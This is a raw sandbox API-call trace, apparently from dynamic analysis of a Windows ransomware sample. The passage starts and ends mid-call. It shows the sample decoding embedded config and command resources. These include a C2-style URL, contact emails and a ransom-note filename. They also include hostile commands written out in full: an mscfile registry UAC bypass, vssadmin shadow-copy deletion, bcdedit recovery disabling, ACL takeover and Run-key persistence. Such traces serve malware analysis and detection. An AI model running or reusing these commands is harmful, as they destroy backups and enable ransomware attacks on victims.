cchData=256 | out: lpLCData="0") returned 2 [0112.698] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0112.698] LoadLibraryW (lpLibFileName="ws2_32.dll") returned 0x77380000 [0112.699] GetProcAddress (hModule=0x77380000, lpProcName="WSAIoctl") returned 0x77382fe7 [0112.699] GetProcAddress (hModule=0x77380000, lpProcName="__WSAFDIsSet") returned 0x77386a8a [0112.699] GetProcAddress (hModule=0x77380000, lpProcName="closesocket") returned 0x77383918 [0112.700] GetProcAddress (hModule=0x77380000, lpProcName="ioctlsocket") returned 0x77383084 [0112.700] GetProcAddress (hModule=0x77380000, lpProcName="WSAGetLastError") returned 0x773837ad [0112.700] GetProcAddress (hModule=0x77380000, lpProcName="WSAStartup") returned 0x77383ab2 [0112.700] GetProcAddress (hModule=0x77380000, lpProcName="WSACleanup") returned 0x77383c5f [0112.700] GetProcAddress (hModule=0x77380000, lpProcName="accept") returned 0x773868b6 [0112.700] GetProcAddress (hModule=0x77380000, lpProcName="bind") returned 0x77384582 [0112.700] GetProcAddress (hModule=0x77380000, lpProcName="connect") returned 0x77386bdd [0112.700] GetProcAddress (hModule=0x77380000, 
lpProcName="getpeername") returned 0x77387147 [0112.700] GetProcAddress (hModule=0x77380000, lpProcName="getsockname") returned 0x773830af [0112.700] GetProcAddress (hModule=0x77380000, lpProcName="getsockopt") returned 0x7738737d [0112.700] GetProcAddress (hModule=0x77380000, lpProcName="htonl") returned 0x77382d57 [0112.700] GetProcAddress (hModule=0x77380000, lpProcName="htons") returned 0x77382d8b [0112.700] GetProcAddress (hModule=0x77380000, lpProcName="inet_addr") returned 0x7738311b [0112.700] GetProcAddress (hModule=0x77380000, lpProcName="inet_ntoa") returned 0x7738b131 [0112.700] GetProcAddress (hModule=0x77380000, lpProcName="listen") returned 0x7738b001 [0112.700] GetProcAddress (hModule=0x77380000, lpProcName="ntohl") returned 0x77382d57 [0112.700] GetProcAddress (hModule=0x77380000, lpProcName="ntohs") returned 0x77382d8b [0112.700] GetProcAddress (hModule=0x77380000, lpProcName="recv") returned 0x77386b0e [0112.700] GetProcAddress (hModule=0x77380000, lpProcName="recvfrom") returned 0x7738b6dc [0112.700] GetProcAddress (hModule=0x77380000, lpProcName="select") returned 0x77386989 [0112.701] GetProcAddress (hModule=0x77380000, lpProcName="send") returned 0x77386f01 [0112.701] GetProcAddress (hModule=0x77380000, lpProcName="sendto") returned 0x773834b5 [0112.701] GetProcAddress (hModule=0x77380000, lpProcName="setsockopt") returned 0x773841b6 [0112.701] GetProcAddress (hModule=0x77380000, lpProcName="shutdown") returned 0x7738449d [0112.701] GetProcAddress (hModule=0x77380000, lpProcName="socket") returned 0x77383eb8 [0112.701] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyaddr") returned 0x77396c01 [0112.701] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyname") returned 0x77397673 [0112.701] GetProcAddress (hModule=0x77380000, lpProcName="getprotobyname") returned 0x773968b3 [0112.701] GetProcAddress (hModule=0x77380000, lpProcName="getprotobynumber") returned 0x773967c4 [0112.701] GetProcAddress (hModule=0x77380000, 
lpProcName="getservbyname") returned 0x77396ef3 [0112.701] GetProcAddress (hModule=0x77380000, lpProcName="getservbyport") returned 0x77396d62 [0112.701] GetProcAddress (hModule=0x77380000, lpProcName="gethostname") returned 0x7738a05b [0112.701] GetProcAddress (hModule=0x77380000, lpProcName="getaddrinfo") returned 0x77384296 [0112.701] GetProcAddress (hModule=0x77380000, lpProcName="freeaddrinfo") returned 0x77384b1b [0112.701] GetProcAddress (hModule=0x77380000, lpProcName="getnameinfo") returned 0x773867b7 [0112.701] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x4e9ec0 | out: lpWSAData=0x4e9ec0) returned 0 [0112.706] GetACP () returned 0x4e4 [0112.706] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fc28 | out: lpCPInfo=0x12fc28) returned 1 [0112.706] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa5c, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\bkm66byk.exe")) returned 0x30 [0112.706] GetTickCount () returned 0x26fe1 [0112.706] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc38 | out: lpPerformanceCount=0x12fc38*=16949549879) returned 1 [0112.706] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x43\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0112.706] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x32\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0112.706] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x59\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0112.706] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, 
lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x68\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0112.706] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x76\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0112.706] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x74\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0112.706] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x33\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0112.706] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6c\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0112.706] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x4c\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0112.707] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x72\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0112.707] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x54\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0112.707] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x43\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 
1 [0112.707] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x57\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0112.707] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x59\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0112.707] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x31\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0112.707] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x48\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0112.707] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0112.707] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0112.707] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0112.707] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0112.707] FindResourceW (hModule=0x400000, lpName="CFG", lpType=0xa) returned 0x51c308 [0112.707] LoadResource (hModule=0x400000, hResInfo=0x51c308) returned 0x50d55c [0112.707] SizeofResource (hModule=0x400000, hResInfo=0x51c308) returned 0xef [0112.707] LockResource (hResData=0x50d55c) returned 0x50d55c [0112.707] FreeResource (hResData=0x50d55c) returned 0 [0112.707] FindResourceW 
(hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0112.707] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0112.707] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0112.707] LockResource (hResData=0x50d64c) returned 0x50d64c [0112.707] GetCPInfo (in: CodePage=0xfde9, lpCPInfo=0x12fa3c | out: lpCPInfo=0x12fa3c) returned 1 [0112.707] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1414f60, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0112.707] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1414f60, cbMultiByte=38, lpWideCharStr=0x140de4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0112.707] FreeResource (hResData=0x50d64c) returned 0 [0112.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0112.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1414f64, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0112.707] GetCurrentThreadId () returned 0xd84 [0112.707] GetCurrentThreadId () returned 0xd84 [0112.707] GetCurrentThreadId () returned 0xd84 [0112.708] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13ccd18, cbMultiByte=239, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 239 [0112.708] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13ccd18, cbMultiByte=239, lpWideCharStr=0x13d2e7c, cchWideChar=239 | out: 
lpWideCharStr="13StarterProcessMutex4\r\n24MainProcessMutex5\r\n35Brother1ProcessMutex6\r\n46Brother2ProcessMutex7\r\n300\r\nCOSLb0cVd9bCx1vp\r\nhttp://statcs.s76.r53.com.ua\r\n131072\r\nbluetablet9643@yahoo.com\r\ndecodedecode@yandex.ru\r\nBl0cked-ReadMe.rtf\r\ndesktop.ini\r\n") returned 239 [0112.708] GetCurrentThreadId () returned 0xd84 [0112.708] GetCurrentThreadId () returned 0xd84 [0112.708] GetCurrentThreadId () returned 0xd84 [0112.708] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"" [0112.708] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x13c399c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5") returned 0x11 [0112.708] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x13c399c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp") returned 0x24 [0112.708] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 1 [0112.709] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local") returned 1 [0112.710] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=7, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0112.711] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=24, fCreate=0 | out: pszPath="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0112.712] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=0, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0112.713] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=25, fCreate=0 | out: pszPath="C:\\Users\\Public\\Desktop") returned 1 [0112.713] SHGetSpecialFolderPathW (in: hwnd=0x0, 
pszPath=0x13c39b4, csidl=32, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 1 [0112.714] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=41, fCreate=0 | out: pszPath="C:\\Windows\\system32") returned 1 [0112.714] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=40, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5") returned 1 [0112.716] ExpandEnvironmentStringsW (in: lpSrc="%COMPUTERNAME%", lpDst=0x13ac63c, nSize=0x8000 | out: lpDst="CRH2YWU7") returned 0x9 [0112.716] ExpandEnvironmentStringsW (in: lpSrc="%USERNAME%", lpDst=0x13ac63c, nSize=0x8000 | out: lpDst="EEBsYm5") returned 0x8 [0112.716] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%", lpDst=0x13ac63c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x21 [0112.716] ExpandEnvironmentStringsW (in: lpSrc="%ALLUSERSPROFILE%", lpDst=0x13ac63c, nSize=0x8000 | out: lpDst="C:\\ProgramData") returned 0xf [0112.716] FindResourceW (hModule=0x400000, lpName="CMDS", lpType=0xa) returned 0x51c380 [0112.716] LoadResource (hModule=0x400000, hResInfo=0x51c380) returned 0x50d72c [0112.716] SizeofResource (hModule=0x400000, hResInfo=0x51c380) returned 0x582 [0112.716] LockResource (hResData=0x50d72c) returned 0x50d72c [0112.716] FreeResource (hResData=0x50d72c) returned 0 [0112.716] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0112.716] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0112.716] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0112.716] LockResource (hResData=0x50d64c) returned 0x50d64c [0112.716] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0112.716] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415008, cbMultiByte=38, lpWideCharStr=0x140deac, cchWideChar=38 | out: 
lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0112.717] FreeResource (hResData=0x50d64c) returned 0 [0112.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0112.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x141500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0112.717] GetCurrentThreadId () returned 0xd84 [0112.717] GetCurrentThreadId () returned 0xd84 [0112.717] GetCurrentThreadId () returned 0xd84 [0112.717] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13ae688, cbMultiByte=1410, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1410 [0112.717] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13ae688, cbMultiByte=1410, lpWideCharStr=0x13c9afc, cchWideChar=1410 | out: lpWideCharStr="%CD%\r\n%SystemRoot%\\system32\\cmd.exe\r\n%SystemRoot%\\system32\\shell32.dll\r\nreg copy \"HKCR\\mscfile\" \"HKCU\\Software\\Classes\\mscfile\" /s /f && reg add \"HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\" /ve /t REG_EXPAND_SZ /d \"[MAIN_PATH]\" /f && \"[AE_PATH]\" & reg delete \"HKCU\\Software\\Classes\\mscfile\" /f\r\nprocess call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"\r\nvssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\nCACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"\r\nreg add 
\"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"[HTA_NAME]\" /t REG_SZ /f /d \"\\\"[HTA_PATH]\"\\\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]\r\nattrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"\r\nexplorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"\r\nreg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /f && reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /v \"29\" /t REG_SZ /f /d \"[ICO_PATH],0\"\r\ntaskkill /f /IM explorer.exe && start explorer.exe\r\n") returned 1410 [0112.717] GetCurrentThreadId () returned 0xd84 [0112.717] GetCurrentThreadId () returned 0xd84 [0112.717] GetCurrentThreadId () returned 0xd84 [0112.717] GetCurrentThread () returned 0xfffffffe [0112.717] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0x0) returned 0 [0112.717] GetLastError () returned 0x3f0 [0112.717] GetCurrentProcess () returned 0xffffffff [0112.717] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0xb8) returned 1 [0112.717] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x2, TokenInformation=0x13c7ae0, TokenInformationLength=0x400, ReturnLength=0x12fc60 | out: TokenInformation=0x13c7ae0, ReturnLength=0x12fc60) returned 1 [0112.717] CloseHandle (hObject=0xb8) returned 1 [0112.717] AllocateAndInitializeSid (in: pIdentifierAuthority=0x4e3754, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x12fc5c | out: pSid=0x12fc5c*=0x226440*(Revision=0x1, SubAuthorityCount=0x2, 
IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0112.717] EqualSid (pSid1=0x226440*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x13c7b44*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 0 [0112.717] EqualSid (pSid1=0x226440*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x13c7b60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 0 [0112.717] EqualSid (pSid1=0x226440*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x13c7b6c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0112.718] GetCurrentProcess () returned 0xffffffff [0112.718] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc68 | out: TokenHandle=0x12fc68*=0xb8) returned 1 [0112.718] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12fc64 | out: TokenInformation=0x0, ReturnLength=0x12fc64) returned 0 [0112.718] GetLastError () returned 0x7a [0112.718] LocalAlloc (uFlags=0x0, uBytes=0x14) returned 0x2276e0 [0112.718] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x2276e0, TokenInformationLength=0x14, ReturnLength=0x12fc64 | out: TokenInformation=0x2276e0, ReturnLength=0x12fc64) 
returned 1 [0112.718] GetSidSubAuthorityCount (pSid=0x2276e8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x2276e9 [0112.718] GetSidSubAuthority (pSid=0x2276e8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x2276f0 [0112.718] LocalFree (hMem=0x2276e0) returned 0x0 [0112.718] CloseHandle (hObject=0xb8) returned 1 [0112.718] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x1 [0112.718] GetDriveTypeW (lpRootPathName="Y:\\") returned 0x1 [0112.718] GetDriveTypeW (lpRootPathName="X:\\") returned 0x1 [0112.718] GetDriveTypeW (lpRootPathName="W:\\") returned 0x1 [0112.718] GetDriveTypeW (lpRootPathName="V:\\") returned 0x1 [0112.718] GetDriveTypeW (lpRootPathName="U:\\") returned 0x1 [0112.718] GetDriveTypeW (lpRootPathName="T:\\") returned 0x1 [0112.719] GetDriveTypeW (lpRootPathName="S:\\") returned 0x1 [0112.719] GetDriveTypeW (lpRootPathName="R:\\") returned 0x1 [0112.719] GetDriveTypeW (lpRootPathName="Q:\\") returned 0x1 [0112.719] GetDriveTypeW (lpRootPathName="P:\\") returned 0x1 [0112.825] GetDriveTypeW (lpRootPathName="O:\\") returned 0x1 [0112.825] GetDriveTypeW (lpRootPathName="N:\\") returned 0x1 [0112.825] GetDriveTypeW (lpRootPathName="M:\\") returned 0x1 [0112.825] GetDriveTypeW (lpRootPathName="L:\\") returned 0x1 [0112.825] GetDriveTypeW (lpRootPathName="K:\\") returned 0x1 [0112.825] GetDriveTypeW (lpRootPathName="J:\\") returned 0x1 [0112.826] GetDriveTypeW (lpRootPathName="I:\\") returned 0x1 [0112.826] GetDriveTypeW (lpRootPathName="H:\\") returned 0x1 [0112.826] GetDriveTypeW (lpRootPathName="G:\\") returned 0x1 [0112.826] GetDriveTypeW (lpRootPathName="F:\\") returned 0x1 [0112.826] GetDriveTypeW (lpRootPathName="E:\\") returned 0x1 [0112.826] GetDriveTypeW (lpRootPathName="D:\\") returned 0x1 [0112.826] GetDriveTypeW 
(lpRootPathName="C:\\") returned 0x3 [0112.826] FindResourceW (hModule=0x400000, lpName="NDNF", lpType=0xa) returned 0x51c420 [0112.826] LoadResource (hModule=0x400000, hResInfo=0x51c420) returned 0x516824 [0112.826] SizeofResource (hModule=0x400000, hResInfo=0x51c420) returned 0x267 [0112.826] LockResource (hResData=0x516824) returned 0x516824 [0112.827] FreeResource (hResData=0x516824) returned 0 [0112.827] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0112.827] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0112.827] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0112.827] LockResource (hResData=0x50d64c) returned 0x50d64c [0112.827] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0112.827] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415008, cbMultiByte=38, lpWideCharStr=0x140deac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0112.827] FreeResource (hResData=0x50d64c) returned 0 [0112.827] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0112.827] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x141500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0112.827] GetCurrentThreadId () returned 0xd84 [0112.827] GetCurrentThreadId () returned 0xd84 [0112.827] GetCurrentThreadId () returned 0xd84 [0112.827] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13a0128, cbMultiByte=615, 
